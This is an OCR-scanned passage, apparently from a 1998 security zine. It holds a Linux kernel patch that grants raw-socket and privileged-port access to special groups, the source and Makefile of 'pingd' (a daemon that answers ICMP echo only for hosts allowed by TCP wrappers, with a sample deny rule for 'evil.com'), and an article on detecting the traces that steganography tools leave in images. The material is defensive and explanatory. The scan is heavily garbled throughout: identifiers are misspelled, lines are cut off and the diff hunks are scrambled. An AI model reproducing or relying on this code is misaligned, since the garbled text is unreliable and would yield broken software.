@@ -111,6 +111,15 @@ 


define min(a,b) ((a)<(b) ? (a): (b) ) 


+#ifdef CONFIG_SPLIT_GID 


+/* 
+ * Priveleged group ids 

+ */ 

+#define PROT_SOCK_GID 16 
+#define RAW_SOCK_GID 17 


+#define PACKET _SOCK_GID 18 
+#endif /* CONFIG _SPLIT_GID */ 


extern struct proto packet_prot; 
extern int raw_get_info(char *, char **, off_t, int, int); 
extern int snmp_get_info(char *, char **, off_t, int, int); 
@@ -435,8 +444,26 @@ 

sk->no_check = UDP_NO_CHECK; 
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prot=&udp_prot; 


} else if (sock->type == SOCK_RAW || sock->type == SOCK_PACKET) { 
+#ifdef CONFIG_SPLIT_GID 
4 /* 
+ * If we are not the super user, check to s if we have th 
+ * corresponding special group priviledge. 
fi: */ 
+ if (!suser()) 
a { 
+ if (sock->type == SOCK_RAW && current-—>egid != RAW_SOCK_GID) 


a { 

+ goto free_and_badperm; 

+ } 

+ else if (sock->type == SOCK_PACKET && current->egid != PACKET_SOCK_GID 


+ goto free_and_badperm; 


+ } 
+#else 


if (!suser()) 
goto free_and_badperm; 
+#endif /* CONFIG_SPLIT_GID */ 
if (!'!protocol) 
goto free_and_noproto; 
prot = &raw_prot; 
@@ -621,7 +648,11 @@ 
if (snum == 0) 
snum = sk->prot-—>good_socknum() ; 
if (snum < PROT_SOCK) { 
+#ifdef CONFIG_SPLIT_GID 
+ if ('suser() && current-—>egid != PROT_SOCK_GID) 
+#else 


if (!suser() ) 
+#endif /* CONFIG _SPLIT_GID */ 
return (-EACCES) ; 
if (snum == 0) 
return (-EAGAIN) ; 


<=> 
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ae 
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[ Linux Ping Daemon 


-—---[ route|daemon9 <route@infonexus.com> 


[ Introduction and Impetus 


I have an idea. How about we rip ICMP_ECHO support from the kernel? How 
t we employ a userland daemon that controls ICMP_ECHO reflection via TCP 
per access control? (Actually, this idea was originally (c) Asriel, who 
the 44BSD version. http://www.enteract.com/*“tqbf/goodies.html. He just 
d me to do the linux version.) 


The bastard son of this idea is pingd. A cute userland daemon that 


handles all ICMP_ECHO and ICMP_ECHOREPLY traffic. The engine is simple. A 


raw 
the 

host 
erec 


type 


ICMP socket under Linux gets a copy of every ICMP datagram delivered to 

IP module (assuming the IP datagram is destined for an interface on that 
). We simply remove support of ICMP_ECHO processing from the kernel and 
t a userland daemon with a raw ICMP socket to handle these packets. 


Once we have the packet, we do some basic sanity checks such as packet 
and code, and packet size. Next, we pass the packet to the authentication 


mechanism where it is checked against the access control list. If the packet 


is a 


next 
host 
cont 


abel 


la. 


llowed, we send a response, otherwise we drop it on the floor. 


he rule for this project was primarily security and then efficiency. The 
version will have an option to send ICMP_HOST_UNREACH to an offending 

. I may also at some point add some hooks for some sort of payload 

ent analysis (read: LOKI detection) but for now, pingd stands as is. 


[ Compilation and Installation 


You will need libwrap and libnet. Libwrap comes with Wieste Venema’s Tcp 
wrapper package and is available from ftp://ftp.win.tue.nl/pub/security/. 
The libnet networking library is available from: 
http://www.infonexus.com/~daemon9/Projects/libnet.tar.gz. 


Build and install both libraries according to their respective instructions. 


Build the program and apply the kernel patch. 
‘make all‘ OR (‘make pingd* AND ‘make patch‘) 


Recompile your kernel. It is NOT necessary to make {config, dep, clean}. 
It is only necessary to: 


‘make; make install * 


(or the equivalent). 


Test the daemon. Ensure that there are no wrapper entries in the 
/etc/hosts.{deny, allow} and start the daemon in debug mode. 


*,./pingd -dl*‘ and then ‘ping 0° 


Edit your TCP wrapper access control files. Simply add a new service 
(ping) and the IP addresses you want to allow or deny: 


‘cat >> /etc/hosts.deny* 
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ping : evil.com 
DS) 
4. Install the program and add it to your /etc/re.d/rc/local: 


‘make install * 


----[ Empirical Data 


This is slower then doing it in the kernel. Especially on localhost. How 
about that. Remotely, the RTIT’s are about .7 - .9 ms longer with a concise 
/etc/hosts.{allow,deny}. This is the price you pay for a more secure 
implementation. All the hosts are on the same 10MB network, with 


approximately the same speed NICs. 


The following Linux machine has a normal kernel-based ICMP_ECHO reflector 
mechanism: 


resentment: /# ping 192.168.2.34 

PING 192.168.2.34 (192.168.2.34): 56 data bytes 

64 bytes from 192.168.2.34: icmp_seq=0 tt1l=64 time=0.8 ms 
64 bytes from 192.168.2.34: icmp_seq=l1 tt1l=64 time=0.6 ms 
64 bytes from 192.168.2.34: icmp_seq=2 tt1l=64 time=0.8 ms 


—--- 192.168.2.34 ping statistics --- 
3 packets transmitted, 3 packets received, 0% packet loss 
round-trip min/avg/max = 0.6/0.7/0.8 ms 


This machine is running pingd compiled with DLOG (and has no kernel 
ICMP_ECHO support): 


resentment: /# ping 192.168.2.35 

PING 192.168.2.35 (192.168.2.35): 56 data bytes 

64 bytes from 192.168.2.35: icmp_seq=0 tt1l=64 time=1.5 ms 
64 bytes from 192.168.2.35: icmp_seq=l1 tt1l=64 time=1.4 ms 
64 bytes from 192.168.2.35: icmp_seq=2 tt1l=64 time=1.3 ms 


--- 192.168.2.35 ping statistics --- 
3 packets transmitted, 3 packets received, 0% packet loss 
round-trip min/avg/max = 1.3/1.4/1.5 ms 


Stress-test of the same host (not recommended to do with debugging on): 


torment# /sbin/ping -f -c 10000 192.168.2.35 

PING 192.168.2.35 (192.168.2.35): 56 data bytes 

--- 192.168.2.35 ping statistics --- 

10088 packets transmitted, 10000 packets received, 0% packet loss 
round-trip min/avg/max = 0.985/36.790/86.075 ms 


resentment:~# ping -f -c 10000 192.168.2.35 
PING 192.168.2.35 (192.168.2.35): 56 data bytes 


=-— 192.063: 22.35: ping statistics -—- 
10001 packets transmitted, 10000 packets received, 0% packet loss 
round-trip min/avg/max = 1.0/1.2/17.4 ms 


An example of the wrapper log: 


Jan 16 18:23:03 shattered pingd: started: 997 
Jan 16 18:24:52 shattered pingd: ICMP_ECHO allowed by wrapper 


7.txt Wed Apr 26 09:43:42 2017 3 
(64 bytes from 192.168.2.38) 
Jan 16 18:24:54 shattered last message repeated 2 times 
Jan 16 18:26:50 shattered pingd: ICMP_ECHO allowed by wrapper 
(64 bytes from 192.168.2.37) 
Jan 16 18:26:58 shattered last message repeated 10087 times 
Jan 16 18:30:09 shattered pingd: ICMP_ECHO allowed by wrapper 
(64 bytes from 192.168.2.38) 
Jan 16 18:30:19 shattered last message repeated 10000 times 
Jan 16 18:47:30 shattered pingd: ICMP_ECHO denied by wrapper 
(64 bytes from 192.168.2.34) 
Jan 16 18:47:32 shattered last message repeated 2 times 
Jan 16 18:48:16 shattered pingd: packet too large 
(10008 bytes from 192.168.2.38) 
Jan 16 18:48:17 shattered last message repeated 2 times 

The cod 


<++> Pingd/Makefile 


Define this if you want syslog logging of ICMP_I 


linux pingd Makefile 
daemon9|route <route@infonexus. 


com> 


ECHO traffic. 


This slows 


slow down daemon response time a bit. 
default: enabled. 
DEFINES a —DLOG 
cc = gcc 
VER = 0.1 
NETSRC = /usr/src/linux/net/ipv4 
INSTALL_LOC = /usr/sbin 
PINGD pingd 
LIBS = -Inet -lwrap 
DEFINES += -D__BSD_SOURCE 
CFLAGS = -O03 -funroll-loops -fomit-frame-pointer -pip m486 —-Wall 
OBJECTS = pingd.o 
c.o 
$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@ 
pingd: $ (OBJECTS) 
$(CC) $(CFLAGS) $(OBJECTS) -o pingd $ (LIBS) 
strip pingd 
all: patch pingd 
patch: 
@(/usr/bin/patch -d $(NETSRC) < patchfile) 
@(echo "Patchfile installed") 
@(echo "You must now recompile your kernel") 
@ (echo "") 
install: pingd 
(install -m755 S(PINGD) $(INSTALL_LOC) ) 
(echo "" >> /etc/rce.d/rce.local) 
(echo "echo \"Starting ping daemon\"" >> /etc/rc.d/rc.local) 
(echo "$(INSTALL_LOC) /$ (PINGD) " >> /etc/rce.d/rc.local) 
dist: clean 
@(cd ..; rm pingd-S(VER).tgz; tar cvzf pingd-S(VER) .tgz Pingd/) 
clean: 
rm -f *.0 core pingd 
# EOF 
<--> 


<++> Pingd/pingd.h 


/* 
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* $Ids 

* 

* Linux pingd sourcefile 

* pingd.h - function prototypes, global data structures, and macros 
* Copyright (c) 1998 by daemon9|route (route@infonexus.com) 

* 

* 

* 

*/ 


ifndef _PINGD_H 
define _PINGD_H 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <string.h> 
nclude <unistd.h> 
nclude <netinet/in.h> 
nclude <netinet/ip.h> 
nclude <netinet/ip_icmp.h> 
nclude <pwd.h> 

nclude <syslog.h> 
nclude <sys/types.h> 
nclude <sys/socket.h> 
nclude <libnet.h> 


ee ee ee ee ee ee 


define NOBODY "nobody" /* Nobody pwnam */ 

define STRING_UNKNOWN "unknown" /* From tcpd.h */ 

define HEADER_MATERIAL 28 /* ICMP == 8 bytes, IP == 20 bytes */ 
define MAX _PAYLOAD 8096 /* Out of thin air */ 


struct icmp_packet 


struct ip iph; 
struct icmphdr icmph; 
u_char payload[MAX_PAYLOAD]; 


}; 


/* FUNCTION PROTOTYPES */ 
void 
usage ( 
char * /* pointer to argv[0] */ 
i 
int /* 1 if the packet is allowed, 0 if denied */ 
verify ( 
struct icmp_packet * /* pointer to the ICMP packet in question */ 
i 
void 


icmp_reflect ( 
struct icmp_packet *, /* pointer to the ICMP packet in question */ 


int /* socket file descriptor */ 

); 
Ant /* 1 if access is granted, 0 if denied */ 
hosts_ctl ( 

char *, /* daemon name */ 

char *, /* client name (canonical) */ 

char *, /* client address (dots ’n’ decimals) */ 

char * /* client user (unused) */ 


i 


#endif /* _PINGD_H */ 
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/* EOF */ 
<--> 
<++> Pingd/pingd.c 
/* 
* $Ids 
* 
* Linux pingd sourcefile 
* ping.c —- main sourcefile 
* Copyright (c) 1998 by daemon9|route <route@infonexus.com> 
* 
* 
* 
* Shlog$ 
* 


/ 
#include "pingd.h" 


int d = 0; /* Debuging level (defaults off) */ 
int max_packet /* Maximum packet size (default) */ 


| 
= 
jo) 
IN) 
ws 

~. 


int 

main(int argc, char **argv) 

{ 
int sock_fd, c; 
struct icmp_packet i_pack; 
struct passwd *pwd_p; 


/* 
* Make sure we have UID 0. 
a 
if (geteuid() || getuid()) 
{ 
fprintf(stderr, "Inadequate privledges\n") ; 
exit(1); 
} 
/* 
* Open a raw ICMP socket and set IP_HDRINCL. 
*/ 
if ((sock_fd = open_raw_sock (IPPROTO_ICMP)) == -1) 
{ 
perror("socket allocation"); 
exit(1); 
} 
/* 


* Now that we have the raw socket, we no longer need root privledges 
* so we drop our UID to nobody. 
urd 
if (! (pwd_p = getpwnam (NOBODY) ) ) 
{ 
fprintf(stderr, "Can’t get pwnam info on nobody"); 
exit (1); 
} 
else if (setuid(pwd_p->pw_uid) == -1) 
{ 
perror("Can’t drop privledges") ; 
exit (1); 
} 


while((c = getopt(argc, argv, "d:s:")) != EOF) 
{ 
switch (c) 
{ 
case ’d’: 
d = atoi(optarg); 
break; 
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case ’s’: 
max_packet = atoi(optarg); 
break; 


default: 
usage (argv[0]); 


if ('!d) daemon(); 
if (da) fprintf(stderr, "Max packetsize of %d bytes\n", max_packet) ; 


#ifdef LOG 

openlog("pingd", 0, 0); 

syslog (LOG_DAEMON|LOG_INFO, "started: Sd", getpid()); 
#endif /* LOG */ 


/* 

* We're powered up. From here on out, everything should run swimmingly. 
ay 

for (77) 


{ 
bzero(&i_pack, sizeof (i_pack)); 
c = recv(sock_fd, (struct icmp_packet *)&i_pack, sizeof(i_pack), 0); 
if (c == -1) 


if (d) fprintf(stderr, "truncated read: %s", strerror(errno)); 
continue; 


} 


/* 
* Make sure packet isn’t too small or too big. 
if, 

if (c < HEADER_MATERIAL || c > max_packet) 


{ 
#ifdef LOG 
syslog ( 
LOG_DAEMON | LOG_INFO, 
"bad packet size (%d bytes from %s)", 
ntohs(i_pack.iph.ip_len) - sizeof (i_pack.iph), 
host_lookup (i_pack.iph.ip_srce.s_addr)); 


#fendif /* LOG */ 
continue; 


} 


/* 
* We only want ICMP_ECHO packets. 
*/ 
if (i_pack.icmph.type != ICMP_ECHO) continue; 
else if (d) 
fprintf(stderr, 
"Sd byte ICMP_ECHO from %s\n", 
ntohs (i_pack.iph.ip_len) - sizeof (i_pack.iph), 
host_lookup (i_pack.iph.ip_srce.s_addr)); 
/* 
* Pass packet to the access control mechanism. 
he 


if (!verify(&i_pack) ) 


#ifdef LOG 
syslog ( 
LOG_DAEMON| LOG_INFO, 
"ICMP_ECHO denied by wrapper (%d bytes from %s)", 
ntohs(i_pack.iph.ip_len) - sizeof (i_pack.iph), 
host_lookup (i_pack.iph.ip_srce.s_addr)); 


#fendif /* LOG */ 
} 


else 
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{ 
#ifdef LOG 
syslog ( 
LOG_DAEMON | LOG_INFO, 
"ICMP_ECHO allowed by wrapper (%d bytes from %s)", 
ntohs(i_pack.iph.ip_len) - sizeof (i_pack.iph), 
host_lookup (i_pack.iph.ip_sre.s_addr)); 


#endif /* LOG */ 
icmp_reflect (&i_pack, sock_fd)j; 
} 


void 
icmp_reflect (struct icmp_packet *p_ptr, int sock_fd) 
{ 

int c; 

u_long tmp; 

struct sockaddr_in sin; 


bzero((struct sockaddr_in *)&sin, sizeof(sin)); 
/* 
* Formulate ICMP_ECHOREPLY response packet. All we do change the 
* packet type and flip the IP addresses. This avoids a copy. 
“ie 
tmp = p_ptr->iph.ip_dst.s_addr; 
p_ptr->iph.ip_dst.s_addr = p_ptr->iph.ip_src.s_addr; 
p_ptr->iph.ip_srce.s_addr = tmp; 
p_ptr->icmph.type = ICMP_ECHOREPLY; 
p_ptr->icmph.checksum = 0; 
p_ptr->icmph.checksum = 
ip_check((u_short *) &p_ptr->icmph, 
ntohs(p_ptr->iph.ip_len) - sizeof(struct ip)); 
sin.sin_family = AF_INET; 
sin.sin_addr.s_addr = p_ptr->iph.ip_dst.s_addr; 


c = sendto(sock_fd, 
(struct icmp_packet *)p_ptr, 
ntohs (p_ptr->iph.ip_len), 
0, 
(struct sockaddr *) &sin, sizeof(sin)); 


if (c != ntohs(p_ptr->iph.ip_len) ) 
{ 
if (d) perror("truncated write"); 
return; 
} 
else if (d) fprintf(stderr, "ICMP_ECHOREPLY sent\n"); 


int 

verify(struct icmp_packet *p_ptr) 

{ 

if ('thosts_ctl("ping", 
host_lookup (p_ptr->iph.ip_srce.s_addr), 
host_lookup (p_ptr->iph.ip_srce.s_addr), 
STRING_UNKNOWN) ) 
return (0); 


else return (1); 


void 
usage(char *argv0) 


{ 


7.txt Wed Apr 26 09:43:42 2017 8 


fprintf(stderr, "usage: %s [-d 1|0 ] [-s maxpacketsize] \n",argv0) ; 
exit (0); 
} 
/* EOF */ 
<--> 
<++> Pingd/patchfile 
--- /usr/src/linux/net/ipv4/icmp.c.original Sat Jan 10 11:10:36 1998 
/usr/src/linux/net/ipv4/icmp.c Sat Jan 10 11:19:23 1998 
@@ -42,7 +42,8 @@ 
Elliot Poger : Added support for SO_BINDTODEVICE. 
Willy Konynenberg 2 Transparent proxy adapted to new 


socket hash code. 


route : TO) 3/9:82% ICMP_ECHO / ICMP_ECHOREQUEST 
support into userland. 


RFC1122 (Host Requirements Comm. Layer) Status: 
(boy, are there a lot of rules for ICMP) 

@@ -882,28 +883,6 @@ 

kfree_skb(skb, FREE_READ) ; 


t 
+ + + + F F F HF F 


_/* 
eee Handle ICMP_ECHO ("ping") requests. 

ee 

= RFC 1122: 3.2.2.6 MUST have an echo server that answers ICMP echo requests. 

oe RFC 1122: 3.2.2.6 Data received in the ICMP_ECHO request MUST be included in the re 
ply. 

= RFC 1812: 4.3.3.6 SHOULD have a config option for silently ignoring echo requests, 
MUST have default=NOT. 

=e See also WRT handling of options once they are done and working. 

= #Y 


-static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct device *dev, 
2 saddr, __u32 daddr, int len) 

st 

-#ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS 

= struct icmp_bxm icmp_param; 
= icmp_param.icmph=*icmph; 
- icmp_param.icmph.type=ICMP_ECHOREPLY; 

7 icmp_param.data_ptr=(icmpht1) ; 

aa icmp_param.data_len=len; 

- if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0) 
icmp_build_xmit (&icmp_param, daddr, saddr, skb->ip_hdr->tos); 


Ct] 


- kfree_skb(skb, FREE READ) ; 


~ Handle ICMP Timestamp requests. 
@@ -1144,8 +1123,8 @@ 
i, 


static struct icmp_control icmp_pointers[19] = { 

-/* ECHO REPLY (0) */ 

- é&icmp_statistics.IcmpOutEchoReps, &icmp_statistics.IcmpIn 

L }, 

+/* ECHO REPLY (0) - Disabled, we now do ICMP_ECHOREQUEST in 

+ édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, N 
édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, N 

édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, N 

/* DEST UNREACH (3) */ 

@@ -1156,8 +1135,8 @@ 

é&icmp_statistics.IcmpOutRedirects, é&icmp_statistics.IcmpInRedirects, icmp_redirect, 

&xrl_ redirect }, 

édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 


Gl 


choReps, icmp_discard, 0, 


userland */ 
U }, 
ULL }, 
U Pe 


__u3 


NUL 
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{ &édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
-/* ECHO (8) */ 
- { &icmp_statistics.IcmpOutEchos, &icmp_statistics.IcmpInEchos, icmp_echo, 
+/* ECHO (8) - Disabled, we now do ICMP_ECHOREQUEST in userland */ 
+ { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
{ &édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
{ &édummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL }, 
/* TIME EXCEEDED (11) */ 
<--> 


0, 


NULL }, 
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[ Steganography Thumbprinting 


[ The HackLab (http://www.hacklab.com) 


Steg*a*nog"ra*phy (?), n. [Gr. covered (fr. to cover closely) + 
-graphy.] The art of writing in cipher, or in characters which are not 
intelligible except to persons who have the key; cryptography. 


i. Introduction 


While this may be a general description of cryptography, steganography has 
come to describe not only the act of encrypting data, but also of hiding its 
very existence. Steganography (or "stego") uses techniques to store a 
"message" file within a "container" file by altering the container file in 
such a way as to make the original file _appear_ unchanged. The resulting 
file can be referred to as the stego file and contains the message fil 
enclosed in a close approximation of the original container file. Several 
tools exist (mostly for DOS/Windows/NT) which automate these functions using 
DES, DES3 or IDEA as encryption methods and BMP, GIF, JPG, WAV, VOC and even 
ASCII files as containers. Using these tools, data can be hidden within 
images, sounds, and even other data files. However, these tools do leave 
perceptible traces on their container files and do not offer nearly the 
level of obfuscation the user assumes. 


This article will provide the reader with a fundamental understanding of 
basic stego techniques and will highlight some of the "thumbprints" left by 
modern steganographic toolsets, specifically on graphic images. Not intended 
to challenge the cryptographic strength or perceptible mathematical variances 
of current steganographic techniques, this article will give the reader a 
basic understanding of stego and suggest low-budget methods for detecting and 
cracking basic steganographic techniques. Also presented is a program which 
can be used to brute-force two of the most popular stego toolsets. 


I. Basic Steganography 


Simply put, steganography involves the hiding of messages. While there are 
many techniques employed by the various tools, the least common denominator 
amongst most toolsets is the modification of some of the Least Significant 
Bits (or LSBs) of the container file’s individual bytes. In the simplest 
example, consider the following binary representations of the numbers 20 
through 27: 


10100 10101 10110 10111 11000 11001 11010 11011 


By modifying the LSBs of these binary digits, we can hide the binary 
representation of the number 200 (11001000) across the above bytestream: 


10101 10101 10110 10110 11001 11000 11010 11010 


By reconstructing the LSBs of the above bytestream, we recover the number 
200 (11001000). In the abov xample, the original bytestream of the numbers 
20-27 is the container, while the number 200 is the message file. This is a 
very poor basic example since the resulting stego file is not an accurate 
representation of the original file. After modification to include the 
message file, the numbers 20-27 now read: 


21 21 22 22 25 24 26 26 


However, in most stego applications, the container file does not contain 
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bytestreams which are rendered useless by modifying LSB information. 
Instead, container files typically contain various levels of "noise" at the 
level of the LSB’s which when viewed apart from the rest of the byte can 
appear random. A sound (.WAV) file, for example contains mostly inaudible 
background noise at the LSB level. An 8-bit graphic file will contain minor 
color differences at the LSB level, while a 24-bit image will contain color 
changes which are nearly imperceptible to the human eye. A very common 
container format is a 256 color, 8 bit image such as a GIF or BMP file. 


II. Stego Techniques 


In an 8-bit image such as a GIF or BMP each pixel is described as a number 
from 0 - 255 which refers to an actual color in the "color lookup table" or 
palette. A common misconception is that all images simply contain strings of 
bytes that describe individual colors, and that the graphic file simply 
lists these colors in left-to-right, and top-to-bottom fashion. This is 
only partially true for 8-bit images. The palette lists every color that is 
used in the image (and extra colors, if less than 256 total colors are actually 
used in the image), and the image data itself is stored as a series of digits 
from 0 - 255 which reference an entry in the palette. In this way, the image 
can be reconstructed by performing palette lookups to determine the color to 
insert at that pixel location. 


In order to hide data within an 8-bit GIF or BMP container, most existing 
tools use one of two techniques which I will term LSB palette referenc 
modification and RGB element LSB modification. 


LSB palette reference modification involves changing the LSB(s) of a 


_palette_reference_ (0 255) in order to hide the data contained in the 
message. Remember that a palette reference simply contains a number from 0 - 
255 which references a color, or entry, in the palette. In order to hide 
data, a program utilizing palette reference modification may decide which 


color to point to based on the color’s LSBs. This type of program will pay 
no attention to how similar the colors are, only whether or not the LSBs 
serve its purpose of data hiding. If the adjacent colors in the palette hav 
dissimilar LSBs, they are well suited for data hiding and become good 
candidates for storing hidden text in the final stegoed container. If a 0 
(zero) is meant to be hidden, the stego program inserts the palette index 
reference of the color with the LSB of 0 (zero), and vice versa for hiding a 
1 (one). 


RGB element LSB modification involves modifying the pixel’s _actual_color_ 
by changing the LSB of the Red, Green or Blue elements of the color in the 
color table. For example, the color "white" is represented by the RGB values 
255,255,255 which in binary equates to: 


11111111 1211111111 11111111 


listed in RGB order. By altering the LSB of each color in the RGB element, 
we can hide data by making almost identical copies of colors such that only 
the LSBs are different. Since the color is only changed by one or two LSBs, 
the resulting colors are very close, perhaps undetectable to the human eye. 
The result of this change to the colors in the tabl nables nearly identical 
colors to be referenced by multiple tabl ntries. This becomes extremely 
obvious when the palette is viewed and sorted by luminance (relative 
brightness)in a product such as Paint Shop Pro. These similar colors will be 
grouped right next to each other in a luminance-sorted palette. Using this 
technique, a binary 1 in the message file can be represented in the stego file 
by replacing a color in the container file with an altered version of that 
color whose RG or B element ends with a binary 1. Likewise, a binary 0 in the 
message file can be represented in the stego file by replacing the original 
color in the container file with an altered version of that color whose RG or 
B element ends with a binary 0. 


III. Steganographic Thumbprints 
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Several tools are available that apply these techniques to files on 
several different platforms. I will focus on two specific toolsets; Steganos 
and S-Tools v4.0. Steganos is perhaps the most versatile and powerful of the 
toolsets, while S-Tools seems to be the easiest and most widely used (not to 
mention the fact that I like S-Tools; it’s been around for a long time and 


is very well done). Other available toolsets include similar functionality 
and hiding techniques. In order to discover what the tools actually do when 
they hide data, it’s best to use a simple BMP container file. The RGB BMP 


file utilizes a palette scheme identical to that of a GIF for the purposes 
of our tests, and all the reviewed toolsets can use BMP files as containers. 


For example, consider a container image which is 50 pixels by 50 pixels and 
contains only black-colored (0,0,0) pixels. This image references palett 
entry O (zero) as its only color. I will use a freeware painting program Paint 
Shop Pro V4.10 (PSP) to create and analyze the base images. When creating 
this image, PSP used a default palette with 216 unique palett ntries and 40 
"filler" entries at the end of the palette all of which contain the value 


(0,0,0) or pure black. 


Our message file is simply a text file which contains the phrase "This is a 
test...7 


A. S-Tools 


When the message file is hidden using S-Tools, the resulting 8-bit image 
appears identical to the human eye when compared to the original. However, 
there are perceptible oddities about the file which are revealed under closer 
scrutiny. 


Since S-Tools uses RGB element LSB modification as its hiding technique, 
the palette has distinct and very obvious characteristics. Many of the 


palette’s colors are offset by a single bit in the R,G or B element. This is 
very obvious when the palette is sorted by luminance (brightness) and viewed 
with PSP. The first sixteen (and only original) colors in this palette are: 


(51,1,1) (51,1,0) (50,1,0) (51,0,1) (51,0,0) (50,0,1) (50,0,0) 
(1,1,0) (1,1,0) (0,1,1) (0,1,0) (1,0,1) (1,0,1) (1,0,0) (0,0,1) (0,0,0) 


Notice that the offsets of the RGB elements are only 1 bit. This is an 
imperceptible color change, and is a very wasteful use of the palette. 
Remember, there are only 256 colors to work with. Most 8-bit image creation 
programs are very careful when deciding which colors to include in the palette, 
and almost all use standard palettes which contain all the most commonly used 
colors. To see a palette with this many _nearly_ identical colors is odd. 
Also, the palette has been adjusted to contain less colors. The standard 
colors selected by PSP have been replaced by some of the colors listed above. 
As is typical with this type of hiding, the slack space at the end of the 
palette has been reduced to make room for the new copies of existing colors. 
This type of hiding will always make itself obvious by using single-bit 
offsets in one or more of the LSBs. Since this type of thumbprint is so 
easily identifiable, we will concentrate our efforts on the harder-to-detect 
palette reference method used by Steganos. 


B. Steganos 


Steganos kindly reminds you that 8-bit images don’t make terribly secure 
containers. It’s a good thing, too, because when the message file is hidden 
using Steganos the resulting 8-bit image has a major anomaly- the stego 
image is completely different than the original! As opposed to an all-black 
image, the image now resembles a black-and-blue checkerboard. However, this 
difference is only obvious if you have access to the original image. Since 
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an interceptor will most likely not have a copy of the original image, we 
will examine other methods of detection. When the palette of the image is 
checked for single-bit offset colors (as in the stego image created with 
S-Tools), none can be found. Also, there is no more or less slack space at 
the end of the palette than existed in the original palette. Steganos does 
not alter the palette in any way when hiding data. It uses the LSB palette 
reference technique described above. However, there are very distinctive 
ways of determining if this technique has been used to hide data, specifically 
by looking at _how_ the palette’s colors are used. In this simple case, a 
histogram will show exactly the type of modification we are looking for. 

In the words of the PSP Help documentation, 


"A histogram is a graph of image color values, typically RGB values and/or 
luminance. In a histogram, the spectrum for a color component appears on the 
horizontal axis, and the vertical axis indicates the portion of the image’s 
color that matches each point on the component’s spectrum." 


In a nutshell, this simply means a graph is generated showing how the 
color(s) are used in an image, and how similar (in shade) they are. When 
viewing the "blue" histogram for the Steganos-hidden file, we s something 
like this: 


100= X xX 
- X xX 
90 = X xX 
aaa « xX 
80 = X xX 
- X xX 
70 =X xX 
- X xX 
60 = X xX 
- X xX 
50 = X xX 
- X xX 
40 =X xX 
ma oe xX 
30 =X xX 
ee ;4 Xx 
20 = X X 
mE xX 
10 = X xX 
ee, xX 
00 = X xX 
ea te OU weal tee alo sat al iy TM eal ag avs Bh ie HS ees ae 
0 1 2 3 4 5 6 7 8 9 2 
0 0 0 0 0 0 0 0 0 0 5 
5 
The X-axis shows the spectrum for the color blue (from 0 to 255). The 


Y-axis shows the number of pixels in the image that match that color. When 
displaying a histogram, the 100 on the Y axis is not percentage, but a MAX 
value (in this case 1272) which indicates the greatest number of pixels used 
for _any_one_color_. Since there are really only two colors _used_ in this 
stego image, there are only two vertical bars. These bars indicate that in 
the Blue color family there are really only two colors used; one with a blue 
value of zero, and another with a blue value of approximately 50 (51 to be 
exact). Upon examining the color table for this image sorted in 
_palette_order_, it is evident that these two referenced colors are only 
Similar since they are placed right next to one another in the palette. Th 
two colors are (0,0,0) and (0,0,51) or black and very, very dark blue. The 
image mostly has black hues, and Steganos probably picked the very dark blue 
color (00110011) as the 1 for some hidden data, and black (00000000) as the 

0 for some hidden data since these colors are _right_ next to each other in 

a palette-index-order color table listing. Although they reside next to each 
other in the palette, the colors are not very similar which makes the final 
stego file appear discolored. Steganos does not modify any of the colors, 
but it modifies how the original palette is used by making nearly equal 
references to a color and its neighbor (when sorted by palette index). 
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Bottom line: this image uses neighboring palette colors nearly an identical 


number of times. 1272 pixels were used for black and 1228 pixels were used 
for the dark, dark blue. This would not be unusual if not for the fact that 
the colors are palette index neighbors. If the designer of the image were 


using some sort of shading effect, there would be many more than just two 
shades involved in this 256 color image, and the shading offsets would be 
greater. These two colors don’t even appear as shades of one another when 
placed side-by-sid 


A skilled interceptor will know immediately that something is not quite 
right with these images. They both display typical signs of data hiding. 


IV. Real-World example 


Intercepting a single-color image and determining that it is stegoed is a 
trivial task. Increasing the number of used colors within the boundaries of 
the 256-color palette could (so the reader may think) obfuscate the hidden 
message file. However, by applying a few simple methodologies, a pattern 
emerges which can increase the odds of detecting a stegoed image. For 
example, if a two-color image is created using only the colors black (0,0,0) 
and white (255,255,255), and data is hidden in the file by using Steganos, 
the results would show that Steganos not only used black and white, but two 
more colors from the palette are used with values of (0,0,51) and 
(255,255,51) respectively. These newly-used colors adjoin the original two 
colors in the palette listing, have differing LSBs, and are referenced 
nearly as much in the new image as the original colors are. A similar 
situation evolves when a 6-color image is created. After Steganos hides the 
data, the original 6 colors and their palette neighbors will be used in 
the new file. The 6 new colors become alternate representations of the 
original 6 colors in terms of their LSBs. This methodology holds true all 
the way up to images containing 256 different colors. By understanding these 
patterns, all 8-bit Steganos images can be detected without access to the 
original image. 


When attempting to detect the use of steganography in 16 or 24-bit images, 
a great deal of pattern analysis must be used. 24-bit stego detection is not 
for the faint of heart, but it can be done. Standard "randomization" solutions 
fall quite short of solving this problem since LSB data in image creation 
programs is hardly random. It follows a pronounced pattern when viewed as a 
part of a whole: an 8-bit number. Most standard graphics effects do not use 
random data, they use patterns to create and maintain a certain graphic 
illusion. Inserting "random" data, even at the LSB level can become fuel for 
the analyst’s fire. In many 24-bit stego programs, bits in the secret text 
are generally inserted with average spacing between them, then random "noise" 
is added to make the secret bits seem less obvious. The random "noise" would 
(should!) have a random interval between differing bits. The contrast of an 
average spacing against random spacing may be enough to not only alert an 
analyst, but to point out where secret bits start and random bits begin. The 
bottom line is that 24-bit detection is doable, just not practical for an 
amateur- yet! 


V. The Future 


Steganography is in it’s infancy, but several new technologies are emerging 
including selection and construction methods of data hiding and continuing 
research in the area of random distribution. 


Selection involves the generation of a large number of copies of the same 
container file that differ slightly. In the case of an image file, you may 
make minor adjustments in hue, saturation and RGB levels to the end that your 
secret message will eventually _appear_ in the LSBs of the data! Although 
difficult to generate, this type of data hiding is nearly impossible to detect 
since the image’s characteristics are not altered at all 
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Construction simply involves modeling the characteristics of the original 
